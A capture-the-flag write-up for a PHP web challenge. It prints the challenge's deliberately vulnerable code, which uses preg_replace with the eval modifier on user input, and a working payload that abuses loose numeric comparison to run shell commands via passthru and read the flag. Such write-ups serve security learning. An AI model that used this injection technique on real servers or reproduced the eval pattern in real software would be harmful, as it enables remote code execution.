HACKYOU CTF 2012 write-up: Web 300
The page provided appears to be a pseudo random number generator. By reading the page source we can retrieve the PHP sources of the challenge and the flag location (not directly readable)
<!-- can't touch this: http://securerng.misteryou.ru/flag.txt.gz -->
<!-- can touch this: http://securerng.misteryou.ru/index.php.txt -->
is valid PHP code (yes, it is!)
function b($b){return eval(/* some php bytecode that breaks the current post */);}
After half an hour of meticulous deobfuscation, some clean PHP code comes out (b()
function not included)
printf("<!DOCTYPE html>
<title>RNG of Ultimate Security</title>
<h3>The Most Secure RNG in the World</h3>
<!-- can't touch this: http://securerng.misteryou.ru/flag.txt.gz -->
<!-- can touch this: http://securerng.misteryou.ru/index.php.txt -->
<form method='POST'>
Enter the seeds for random number generation, one by line:<p/>
<textarea name='rng_seeds' cols=50 rows=10>");
$seeds = $_POST["rng_seeds"];
$algorithm = $_POST["rng_algorithm"];
$algorithm_val = "5368413128644154652843527950542843524333322873545252655628414273282431255371725428655850284558702870492829292929292929292929";
if($algorithm != $algorithm_val)
printf("wuut?! hacker detected!");
else printf(preg_replace("#\b(\d+)\b#se", pack("H*", $algorithm), $seeds));
# \b Match a word boundary
# \d Match a digit character
} else {
foreach(range(1,5) as $_)
<input type='hidden' name='rng_algorithm' value='5368413128644154652843527950542843524333322873545252655628414273282431255371725428655850284558702870492829292929292929292929' />
<input type='submit' value='Generate »' />
We see that the modifier PREG_REPLACE_EVAL
is set for the substitution pattern inside preg_replace($pattern, $replacement, $subject)
. The replacement string is thus evaluated as PHP code and the result is used for replacing the matching subject string. The code actually executed is the following
php > echo pack("H*", "5368413128644154652843527950542843524333322873545252655628414273282431255371725428655850284558702870492829292929292929292929");
Thus, to inject some code in the $algorithm
variable, we must exploit the comparison between numerical strings at line 18. PHP compares numerical strings in a really funny way. See this page for examples.
A possible solution is to hex-encode some functions to retrieve the flag into a number of the same length of $algorithm_val
with at least the 16 most significant digits equal to $algorithm_val
. It’s not straightforward to get a working snippet of code using a limited set of characters whose hexadecimal representation is a number, but we are allowed to perform a call to passthru
using sh
command substitution of dir
as an argument for cat
>>> 'ShA1(dATe(passthru("cat $(dir)")))'.encode("hex").ljust(124, "0")
After sending this number as the POST parameter rng_algorithm
, we download the file flag.txt.tgz
which appears to be base64 encoded several times. A simple sh
while loop is enough to avoid useless typings
$ while [ $? -eq 0 ]; do encoded=$(cat flag.b64); echo $encoded | base64 -d > flag.b64; done > /dev/null 2>&1; echo $encoded
flag: 36e03906042b7b266afa32bd1ea35445
Great challenge, thanks to vos and leetmore!